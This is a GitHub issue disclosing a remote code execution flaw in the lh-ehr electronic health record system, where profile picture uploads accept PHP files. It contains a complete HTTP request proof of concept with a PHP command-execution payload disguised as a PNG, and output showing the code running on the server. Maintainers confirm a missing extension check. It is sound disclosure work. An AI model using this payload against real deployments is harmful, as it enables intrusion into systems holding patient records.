Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security issue: Remote code execution via user picture upload #1223

Closed
C-Sto opened this issue Aug 11, 2018 · 6 comments
Closed

Security issue: Remote code execution via user picture upload #1223

C-Sto opened this issue Aug 11, 2018 · 6 comments
Labels
Web Security White Hat Reports, Cross Site SQL Injection, etc

Comments

@C-Sto
Copy link

C-Sto commented Aug 11, 2018

The Issue

Arbitrary file upload vulnerability allowing any user who can set profile pictures to be able to execute code on the hosting system.

In lh-ehr, an attacker must be authenticated, and have sufficient privileges to upload a user profile picture (either for a user, or a patient) to perform this attack. It appears any valid user can perform this.

Issue location

Occurs at

lh-ehr/interface/patient_file/summary/demographics.php

Line 1735 in 5b5f427

if (move_uploaded_file($_FILES["profile_picture"]["tmp_name"], $destination_directory.$pid.".".$imageFileType)) {

POC:

POST /lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391 HTTP/1.1
Host: 192.168.9.142
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.142/lh-ehr/interface/patient_file/summary/demographics.php?set_pid=153391
Content-Type: multipart/form-data; boundary=---------------------------216243089528218
Content-Length: 252
Cookie: LibreHealthEHR=e2hroqj4n8d8odrds55bes4ui2
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------216243089528218
Content-Disposition: form-data; name="profile_picture"; filename="T03KD3TL5-U44DPA2RY-73f7cefa04dd-1000.php"
Content-Type: image/png

<?php echo `id`; ?>
-----------------------------216243089528218--

ubuntu@ubuntu:/var/www/html/lh-ehr/profile_pictures$ curl 127.0.0.1/lh-ehr/profile_pictures/153391.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
@naveen17797
Copy link
Contributor

This bypasses the mime type right?

@C-Sto
Copy link
Author

C-Sto commented Aug 11, 2018

Yes, the mime type is set by the 'content type' specified by the user.

The code comments seem to indicate that an extension check is performed too, but that clearly isn't the case.

@naveen17797
Copy link
Contributor

i have coded that module, seems like i have missed some check

@naveen17797
Copy link
Contributor

Definitely, missed the extension check

@aethelwulffe
Copy link
Contributor

Good job @C-Sto
Welcome aboard!
-Art

@muarachmann
Copy link
Member

Great @C-Sto , @naveen17797 youve got this 😃

@tmccormi tmccormi added the Web Security White Hat Reports, Cross Site SQL Injection, etc label Sep 5, 2018
@naveen17797 naveen17797 mentioned this issue Nov 2, 2018
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Web Security White Hat Reports, Cross Site SQL Injection, etc
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
5 participants
@tmccormi @aethelwulffe @C-Sto @muarachmann @naveen17797